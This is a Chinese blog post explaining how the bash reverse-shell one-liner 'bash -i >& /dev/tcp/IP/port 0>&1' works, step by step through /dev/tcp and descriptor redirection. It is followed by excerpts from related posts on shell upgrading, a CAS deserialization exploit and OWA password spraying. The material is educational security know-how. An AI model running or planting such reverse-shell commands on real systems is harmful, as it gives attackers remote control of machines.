<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    分析bash反彈shell的原理

    一顆小胡椒2021-07-19 22:08:04

    反彈shell的原理分析

    bash -i >& /dev/tcp/192.168.1.1/8888 0>&1
    

    代碼片段:可切換語言,無法單獨設置文字格式

    這個經典反彈shell,我們從原理,命令拆解來解析。

    原理

    反彈shell是由攻擊者無法連接受害者而進行一種操作,可能目標是局域網內主機,或者開啟防火墻的某些策略等情況,我們就可以讓受害者主動向攻擊者發起連接,被控端發起請求到控制端某端口,并將其命令行的輸入輸出轉到控制端,從而實現交互。

    命令拆解

    bash

    Linux中一般默認的shell是bash,它功能幾乎可以涵蓋shell所具有的功能,所以一般的shell腳本都會指定它為執行路徑

    常用的shell有 ash、bash、dash,不同的shell都有自己的特點以及用途

    bash -i 打開一個交互shell,如果shell含有-i參數,即為交互式。交互式的意思是可以和用戶進行交互,輸入命令,回顯給用戶就是一個交互的過程,而執行一個shell腳本往往是非交互的

    如何確認目前的shell是不是交互的,通過echo $-,查看返回的值可以知道。如果帶有i參數即為交互式

        他們之間就是有無I參數的確別。至于其他參數標示什么意思,就不在本次文章范圍內。

    /dev目錄

    dev是設備(device)的英文縮寫。這里主要存放與設備有關的文件。

     /dev/tcp/是Linux中的一個特殊設備,打開這個文件就相當于發出了一個socket調用,建立一個socket連接,讀寫這個文件就相當于在這個socket連接中傳輸數據。同理,Linux中還有/dev/udp/

    /dev/tcp/192.168.1.1/8888
    

    代碼片段:可切換語言,無法單獨設置文字格式

    所以上述命令就是和192.168.1.1:8888建立TCP連接

    文件標識符

    Linux 系統中,把一切都看做是文件,當進程打開現有文件或創建新文件時,內核向進程返回一個文件描述符,文件描述符就是內核為了高效管理已被打開的文件所創建的索引,用來指向被打開的文件。

    所有執行I/O操作的系統調用都會通過文件描述符,即文件描述符可控制輸入輸出(輸入/輸出重定向)

    標準輸入(stdin):代碼為0,使用< 或<< ,默認設備鍵盤
    標準輸出(stdout):代碼為1.使用>或>> 默認設備顯示器
    標準錯誤輸出(stderr):代碼為2,使用2>或2>>,默認設備顯示器
    

    代碼片段:可切換語言,無法單獨設置文字格式

    shell輸入\輸出重定向

    使用1>將輸出結果寫入到指定文件中,文件不存在則創建文件,文件如果存在會覆蓋原文件內容

    省略不寫則默認就是1,同理,輸入重定向0< ,省略不寫則默認就是 0

    shellbash
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    初識Shell
    2022-03-11 22:42:44
    程序是由序列組成的,告訴計算機如何完成一個具體的任務。編寫程序花費的時間往往是實際運行時間的幾十倍或幾百倍。除了計算機生產廠家的專業人員外,絕大多數的 程序員已經不再去學習機器語言了。包含的功能幾乎可以涵蓋Shell所具有的功能,所以一般的Shell腳本都會指定它為執行路徑。目前使用的 并不多,已經被/bin/tcsh所取代。
    # 此時攻擊機已經獲取到了bash$ python -c 'import pty; pty.spawn'$ ctrl + z //快捷鍵。$ fg$ reset //這一步我實測有問題,輸了會出問題,不輸也沒有影響,所以如果輸了有問題可以不輸。低權限提權首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Databas
    0x01 Apereo cas簡介Apereo CAS 單點登陸系統是Java服務器環境下使用較為廣泛的單點登陸系統。CAS 全程Central Authentication Service,是一個單點登錄協議,Apereo CAS是實現該協議的軟件包。Apereo CAS 4.1.X~4.1.6 默認密鑰Apereo CAS 4.1.7~4.2.X KEY隨機生成0x03漏洞利用與復現Webflow中使用了默認密鑰changeit,所以我們就可以利用默認密鑰生成序列化對象。
    本文記錄從零開始搭建F5 BIG-IP漏洞調試環境的細節。
    驗證子域郵箱名Invoke-DomainHarvestOWA-ExchHostname -Domain -UserList .\userName.txt -OutFile sprayed-ews-creds.txt. Office 365近源滲透物理滲透、物理攻擊、近源滲透,這幾個的意思都是在接近目標進行安全測試。Wi-Fi網線沒有終端準入控制,直接插網線 DHCP 獲取 IP。Bad USBBlack Hat 上提出 Bad USB。社會工程學在信息收集過程中就開始。釣魚本質是利用人的信任。Windows 主機FTP服務端開啟 FTP 服務。使用 certutil 下載的文件會原封不動在?目錄下保存一份,文件名位隨機字符,使用 delete 可以刪除剛下載的緩存。
    從Heartbleed到Apache Struts再到SolarWinds,這些是過去10年來發生的分水嶺式的網絡安全事件。嚴重的漏洞、廣泛的網絡攻擊已經改變了網絡安全的許多方面。為了回顧過去10年發生的安全事件,網絡安全供應商Trustwave公司日前發表了一篇名為《十年回顧:漏洞狀態》的博客文章,其中列出了過去10年中最突出和最值得注意的10個網絡安全問題和違規行為。
    AFL--模糊測試使用淺析
    靶場Kioptrix Level 1攻略
    2022-04-21 13:47:27
    雷神眾測擁有對此文章的修改和解釋權。如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經雷神眾測允許,不得任意修改或者增減此文章內容,不得以任何方式將其用于商業目的。
    剛入行時在網上搜各種工具使用技巧及方法,通過別人的經驗提高自身的技巧,然后再拿個小本本記錄,這是每個網安人初入行時的必備姿勢,那么今天丹丹就拿起先前做過的筆記和網上別人的經驗做一個合集,把大部分使用到的工具技巧整理成冊,后續自己以及大家查閱,如總結不到位的地方希望海涵,那現在就開始吧。。。。。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类